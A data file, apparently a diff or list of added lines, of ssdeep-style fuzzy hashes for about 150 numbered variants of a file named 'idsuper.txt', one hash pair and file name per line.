+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3o3803oDc903tKldeBWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLefl8BWFgGQFxR95CI,"idsuper.txt.204"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3+nxFHK3gcRKk030DBYWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVLonx4LYWFgGQFxR95CI,"idsuper.txt.106"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3nW038Xq38fWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLVsXJfWFgGQFxR95CI,"idsuper.txt.119"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3NRq/gTd03N03FvWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL4gxWFgGQFxR95CI,"idsuper.txt.11.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Nq32c+S3Z7dzKCIgWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLG7VLWFgGQFxR95CI,"idsuper.txt.238"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3nh03Cc+W3qG5WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLV8yG5WFgGQFxR95CI,"idsuper.txt.40"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3nAHht3gAzG/53ojNPWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLQhbzRPWFgGQFxR95CI,"idsuper.txt.235"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3n4Vq32TzuFw93XtWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLaHWFgGQFxR95CI,"idsuper.txt.049"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3MxD7kb3/i3R4etVpWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVL6174wpWFgGQFxR95CI,"idsuper.txt.063"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3MwhYff03nwH3BxwxWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLa5wxWFgGQFxR95CI,"idsuper.txt.236"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3mtGm03FWXR03pEID8WcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLUTisI4WFgGQFxR95CI,"idsuper.txt.209"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3MSiw3dooZ33BUSUiWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLwKXrPWFgGQFxR95CI,"idsuper.txt.31.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3mIFW3C2k3Wl9WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLwARmWFgGQFxR95CI,"idsuper.txt.41"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3MDcrd03JQ3ECaWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLeuaWFgGQFxR95CI,"idsuper.txt.206"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3lVnq3ie3lk6WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLbVnaWFgGQFxR95CI,"idsuper.txt.15"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3LQvR031hb3dWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLCvsZWFgGQFxR95CI,"idsuper.txt.193"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3LqBHMg38r493hWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLKGcWFgGQFxR95CI,"idsuper.txt.074"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3LoMb3F+kt3Oh1N+M9WcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL5Ra+KWFgGQFxR95CI,"idsuper.txt.5.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3lmxt33s03UvXgBghWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLc6HdhWFgGQFxR95CI,"idsuper.txt.17.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3lLM03WPg03EhWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLA0VhWFgGQFxR95CI,"idsuper.txt.158"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ljCH53YZ3gJoWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLP+HqiuWFgGQFxR95CI,"idsuper.txt.038"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3LiRH3e2XZZ8032WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLxqOpWFgGQFxR95CI,"idsuper.txt.221"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3LcSKd03/7Hy32IWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLQd0HlIWFgGQFxR95CI,"idsuper.txt.15.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3lAyXK3oqrz32uHfpWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLhOrh/pWFgGQFxR95CI,"idsuper.txt.045"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3L4732t+Q3FcV3OWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLSM+h3OWFgGQFxR95CI,"idsuper.txt.009"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3kvFYI3It3vaKSWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLy9Yd9sWFgGQFxR95CI,"idsuper.txt.162"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3KOWDb3wDl03HWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLEED4WFgGQFxR95CI,"idsuper.txt.37"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3konH383QCANWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLyGJNWFgGQFxR95CI,"idsuper.txt.8"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3KMB3w3Qzg9JO3QMKWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVL0+g3MKWFgGQFxR95CI,"idsuper.txt.223"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3kKt3Z+cR03yvkUsWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLi6MUsWFgGQFxR95CI,"idsuper.txt.093"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3KIN3IAAR031/7Ro6WcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLqAn/W6WFgGQFxR95CI,"idsuper.txt.47"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3kDze303APOAq30OWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL6D+OAkWFgGQFxR95CI,"idsuper.txt.7.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3k1Q3uIKp03caWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLS1xfaWFgGQFxR95CI,"idsuper.txt.229"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3jI632pOL3aFMQWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLtpQWFgGQFxR95CI,"idsuper.txt.191"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3jF+c03shO3MBIX7gWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVL7//qkWFgGQFxR95CI,"idsuper.txt.015"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3jbua803b6B2t3WghWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLl8d2hWFgGQFxR95CI,"idsuper.txt.4"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3iq3ie/039H0TwWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLzYUTwWFgGQFxR95CI,"idsuper.txt.004"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Ik73KJSk83ocfE03WcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLakWcHWFgGQFxR95CI,"idsuper.txt.103"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3IdJ3Tq053NtWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLaBLtWFgGQFxR95CI,"idsuper.txt.228"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3IdDc03vVF6f3liERhWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL3CV/EzWFgGQFxR95CI,"idsuper.txt.25"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3i3m5mO3g/DtWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL8v/DtWFgGQFxR95CI,"idsuper.txt.249"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3hX33mw3ELwqvWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLnQLRvWFgGQFxR95CI,"idsuper.txt.1.005"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3htTR03f3JWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLTbsWFgGQFxR95CI,"idsuper.txt.081"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3HS32s81L03g+Y1R6WcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLm0eWFgGQFxR95CI,"idsuper.txt.3.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3hQUg3cHAva3bD6WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLdH16WFgGQFxR95CI,"idsuper.txt.12"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3hQOKzR03Kd3StgcWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL88ttWFgGQFxR95CI,"idsuper.txt.047"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3hKd031GYtWlR03uc5EWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVLqSJ2NlWFgGQFxR95CI,"idsuper.txt.097"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Hjbh3ni37WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL5jCWFgGQFxR95CI,"idsuper.txt.262"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3+HHt3GiZ32uWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLwHkUWFgGQFxR95CI,"idsuper.txt.022"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3HB1r3Qs03NxcWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLr1E/SWFgGQFxR95CI,"idsuper.txt.254"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3h8pN3+lO3F/JRWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLQpsQTWFgGQFxR95CI,"idsuper.txt.53"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3H50x3WRlaB362pKWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLn0Ea9KWFgGQFxR95CI,"idsuper.txt.140"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3h2N34ffYk03NdtsEyWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLstNyWFgGQFxR95CI,"idsuper.txt.138"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3+gxq3bWxE53P/WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLbxCdWFgGQFxR95CI,"idsuper.txt.11"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3g/qW38c7bR03DQ9WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLiYc71WFgGQFxR95CI,"idsuper.txt.38"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3GKe307D38oWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLLkoWFgGQFxR95CI,"idsuper.txt.275"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3gHCLp3xjqg0349uHkWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL4g+kWFgGQFxR95CI,"idsuper.txt.109"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Gfy903R4Q3h+Q5CWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLVlW+OCWFgGQFxR95CI,"idsuper.txt.073"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3gEZ32SGyslW3q+WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLRFGysiWFgGQFxR95CI,"idsuper.txt.011"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3fxOY32qXi0323I8WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLjOw6I8WFgGQFxR95CI,"idsuper.txt.121"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3fwgH3kfx3n9rWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLB2rWFgGQFxR95CI,"idsuper.txt.272"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3fF4Bt3X6+3GB7WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL4BY7WFgGQFxR95CI,"idsuper.txt.227"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3FBO32Xl03oQSWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLNliSWFgGQFxR95CI,"idsuper.txt.173"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3fBl03CcHU3cyQWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLDlo1hWFgGQFxR95CI,"idsuper.txt.157"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3F3BWgRFO3pxAFWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLogjSgWFgGQFxR95CI,"idsuper.txt.037"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3eW3/lU3vBB8WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLXEBuWFgGQFxR95CI,"idsuper.txt.252"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3eTMR03ybcZ3JzeWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLu8beqWFgGQFxR95CI,"idsuper.txt.264"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3EqH3DA53vRUDLQp/CT9WcCOkgGQlTJB+kikFZ:k3iymIsYv5WuVLBTvD1WFgGQFxR95CI,"idsuper.txt.25.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ePR3hV3miTWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL0rwiTWFgGQFxR95CI,"idsuper.txt.096"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3EP+3agHjRO3gPs8KWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLqeHjWxWFgGQFxR95CI,"idsuper.txt.108"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3EFv3BZR03wdxupWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLUJldxaWFgGQFxR95CI,"idsuper.txt.2.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3EdsdR34PxoA03DyWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLuNeAwyWFgGQFxR95CI,"idsuper.txt.51"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ec49H03dBQ4032ceNhWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVL0x9ifhWFgGQFxR95CI,"idsuper.txt.012"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3e4032Ter3l05WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLE4l4EWFgGQFxR95CI,"idsuper.txt.284"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3E3IW3QjsWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL/sWFgGQFxR95CI,"idsuper.txt.051"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Dvhe3uBUJ320HBWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLJvhi/BWFgGQFxR95CI,"idsuper.txt.35.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ds/mJHt3QJyTu03NLvvWcCOkgGQlTJB+kikFZ:k3iymIsYv5WuVLe+awpHWFgGQFxR95CI,"idsuper.txt.143"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3dbiyN3cFA3r7JWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLW1iJWFgGQFxR95CI,"idsuper.txt.189"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3cX03y8f5R03M1WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLqXRS1WFgGQFxR95CI,"idsuper.txt.256"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3CW3D/83cJkW/WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLZ/JJHWFgGQFxR95CI,"idsuper.txt.267"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3cQ0G3JMp3f6LJ9WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLuQop4WFgGQFxR95CI,"idsuper.txt.174"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3cN3AZ803f8WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLy48WFgGQFxR95CI,"idsuper.txt.132"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3cKg83cwKCp03g5WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLulCNWFgGQFxR95CI,"idsuper.txt.020"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Ck33lR3RG1/pWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLpnG1/pWFgGQFxR95CI,"idsuper.txt.261"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3CD3r3DtSsCpWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLgp4pWFgGQFxR95CI,"idsuper.txt.142"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3CB34K3lmBXDt3dI8ASWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVLaLmgSWFgGQFxR95CI,"idsuper.txt.36"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3c8H3LmsQ3crMjRWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLRraWFgGQFxR95CI,"idsuper.txt.2"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3C3y3hTHWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLTHWFgGQFxR95CI,"idsuper.txt.168"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3C1W43xZd3TIWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLo2WFgGQFxR95CI,"idsuper.txt.115"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3C0W3qrEcAQ3DlnWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLo/OnWFgGQFxR95CI,"idsuper.txt.136"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3BZc3GU3y78WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLP78WFgGQFxR95CI,"idsuper.txt.216"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3bYhQ3EDoz3y7TZfWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLi7TZfWFgGQFxR95CI,"idsuper.txt.061"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3BV/3uRz03TAKWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLLc6vWFgGQFxR95CI,"idsuper.txt.268"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3BO038/ar32wWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLzWazWFgGQFxR95CI,"idsuper.txt.027"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3b8103SH3HZ03X5WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLdyH3HCWFgGQFxR95CI,"idsuper.txt.10"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3b7ZW03O4/Wp3ynRdBWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLRocFWFgGQFxR95CI,"idsuper.txt.161"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3b6d032iDxlR03OspWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLqqjspWFgGQFxR95CI,"idsuper.txt.3"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Azl3NbW3aNBWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLedzWFgGQFxR95CI,"idsuper.txt.241"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3AQFdH3qv93bDH/yWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL7SvJqWFgGQFxR95CI,"idsuper.txt.234"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ApbMH3VYO3oFDKWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLKMOQWFgGQFxR95CI,"idsuper.txt.207"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3aoiG3tclt36BDAE5pWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLAvlHypWFgGQFxR95CI,"idsuper.txt.076"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Akk13oDd3yi4WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLSkwi4WFgGQFxR95CI,"idsuper.txt.213"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3AAhXK38X+Z3ynWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL9Xt+KWFgGQFxR95CI,"idsuper.txt.116"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3A3X403O2SBWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLS4HBWFgGQFxR95CI,"idsuper.txt.225"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l39HCK3qWgJ+3sM/UWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLj7utlWFgGQFxR95CI,"idsuper.txt.240"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l39fc3E34F+WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLIF+WFgGQFxR95CI,"idsuper.txt.040"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38ZDGK3pcIoO3HnWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLOZ5cmnWFgGQFxR95CI,"idsuper.txt.50"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38XPK/3yA3fWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLiXCqKWFgGQFxR95CI,"idsuper.txt.176"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38v33q3g/b1Fa63Ebp+HqhepWcCOkgGQlTJB+E:k3iymIsYv5WuVLcnEWWFgGQFxR95CI,"idsuper.txt.044"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38udVd3HD3y3drWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLVM39WFgGQFxR95CI,"idsuper.txt.218"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38mq3SH3UA4i1pWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLlIA4uWFgGQFxR95CI,"idsuper.txt.055"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38GSl3l3SUWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLGGaWFgGQFxR95CI,"idsuper.txt.282"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l38BTW03bviIt3y33WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLWQt33WFgGQFxR95CI,"idsuper.txt.194"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l37U3A5/G3r4KWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLd3bKWFgGQFxR95CI,"idsuper.txt.28"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l37fkR03vPg03ZLt7WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLVAwh7WFgGQFxR95CI,"idsuper.txt.12.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l36KZoq39vEQ318WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLYuNz8WFgGQFxR95CI,"idsuper.txt.054"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l35TCFBR03KY3GsaWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLObsaWFgGQFxR95CI,"idsuper.txt.18"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l352zR03mriR03GpWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLOXu3WFgGQFxR95CI,"idsuper.txt.030"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l34yVd3ykyA03+SCWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLOyV6oxWFgGQFxR95CI,"idsuper.txt.036"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l34uExIYH35I3iE4WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL2umDi4WFgGQFxR95CI,"idsuper.txt.250"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l34oksJ032Ebt3AyWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLGtXbqyWFgGQFxR95CI,"idsuper.txt.205"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l349QP3Alg39WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLyjyWFgGQFxR95CI,"idsuper.txt.13"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l344I3QDD3yluxWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLHkYxWFgGQFxR95CI,"idsuper.txt.019"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3/3qqG2b53LAvWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLXqWFgGQFxR95CI,"idsuper.txt.007"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l33icAcFf3mOS2Mmt3MtWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVLtHA2RSWFgGQFxR95CI,"idsuper.txt.197"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l33F3PHHE3BVWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLjH6WFgGQFxR95CI,"idsuper.txt.110"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l33EJYt37R03O8WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLd8YP8WFgGQFxR95CI,"idsuper.txt.128"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l33Bj603uzobbt320rcWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL8QcWFgGQFxR95CI,"idsuper.txt.1.002"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l33ad3bQH3gt0TWwpWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL/wIpWFgGQFxR95CI,"idsuper.txt.253"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l332Dt3ck03O3lpWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLs+GWFgGQFxR95CI,"idsuper.txt.084"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l331Rq3DA4d34DuWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLB1R0WFgGQFxR95CI,"idsuper.txt.273"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32zf203LZ030muWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLo26muWFgGQFxR95CI,"idsuper.txt.118"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32voSoR03jHUO3XSWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLGU9WFgGQFxR95CI,"idsuper.txt.133"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32VhQ3dQDfg3VEWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLO+QbWFgGQFxR95CI,"idsuper.txt.072"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32V3Y3gSWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLmSWFgGQFxR95CI,"idsuper.txt.1.007"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32TMWN39RQ3fWWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLebR3WFgGQFxR95CI,"idsuper.txt.22.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32s0103PHW3bzQq2gWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLTsoAWFgGQFxR95CI,"idsuper.txt.52"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32R3LaAoPW3c8WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLU+WWFgGQFxR95CI,"idsuper.txt.43"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32QJ93aIdZ3wzdxUF8WcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLvhd2W8WFgGQFxR95CI,"idsuper.txt.4.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l32Qa3lC1Go32tBbWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLNdYbWFgGQFxR95CI,"idsuper.txt.039"
